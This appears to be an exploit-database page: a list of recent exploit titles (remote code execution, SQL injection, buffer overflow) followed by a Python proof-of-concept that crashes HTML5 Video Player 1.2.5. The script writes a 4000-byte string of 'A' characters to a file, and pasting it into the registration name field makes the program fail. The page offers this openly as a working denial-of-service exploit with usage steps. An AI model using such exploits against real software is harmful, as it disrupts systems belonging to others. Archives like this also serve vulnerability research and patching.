
7 changes to exploits/shellcodes Zenmap (Nmap) 7.70 - Denial of Service (PoC) HTML5 Video Player 1.2.5 - Denial of Service (PoC) Zenmap (Nmap) 7.70 - Denial of Service (PoC) InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH) Android - 'zygote->init;' Chain from USB Privilege Escalation Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution CMS Made Simple 2.2.5 - Remote Code Execution CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution OpenEMR < 5.0.1 - Remote Code Execution OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution Jorani Leave Management 0.6.5 - 'startdate' SQL Injection Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection OpenEMR 5.0.1.3 - Arbitrary File Actions OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection Bayanno Hospital Management System 4.0 - Cross-Site Scripting
28 lines
No EOL
899 B
Python
Executable file
28 lines
No EOL
899 B
Python
Executable file
# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC)
|
|
# Date: 2018-09-07
|
|
# Exploit Author: T3jv1l
|
|
# Vendor Homepage: http://www.html5videoplayer.net/download.html
|
|
# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe
|
|
# Contact: https://twitter.com/T3jv1l
|
|
# Version: HTML5 Video Player V.1.2.5
|
|
# Tested on: Windows 7 SP1 x86
|
|
|
|
# PoC:
|
|
# 1. Download and install the setup file
|
|
# 2. A file "Evil.txt" will be created
|
|
# 3. Click Help > Register... in tool bar
|
|
# 4. Copy the contents of the file (poc.txt) and paste in the Registration Name field
|
|
# 5. Click Activate and BOOMMMM !!!!
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "\x41" * 4000
|
|
payload = buffer
|
|
try:
|
|
f=open("poc.txt","w")
|
|
print "[+] Creating %s bytes payload..." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |